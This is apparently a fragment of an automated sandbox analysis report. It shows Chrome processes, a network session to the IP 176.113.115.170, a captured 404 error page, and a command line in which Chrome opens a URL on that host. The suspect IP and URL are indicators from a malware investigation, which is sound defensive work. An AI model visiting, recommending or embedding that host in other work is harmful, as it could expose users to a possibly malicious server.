      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.449742176.113.115.17080560C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      Jan 15, 2025 05:45:37.438369989 CET6OUTData Raw: 00
      Data Ascii:


      Click to jump to process

      Click to jump to process

      Click to jump to process

      Target ID:0
      Start time:23:44:42
      Start date:14/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Imagebase:0x7ff76e190000
      File size:3'242'272 bytes
      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:2
      Start time:23:44:45
      Start date:14/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,8290938430860116093,8568642415995171343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Imagebase:0x7ff76e190000
      File size:3'242'272 bytes
      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:3
      Start time:23:44:51
      Start date:14/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://176.113.115.170/1/1.png"
      Imagebase:0x7ff76e190000
      File size:3'242'272 bytes
      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      No disassembly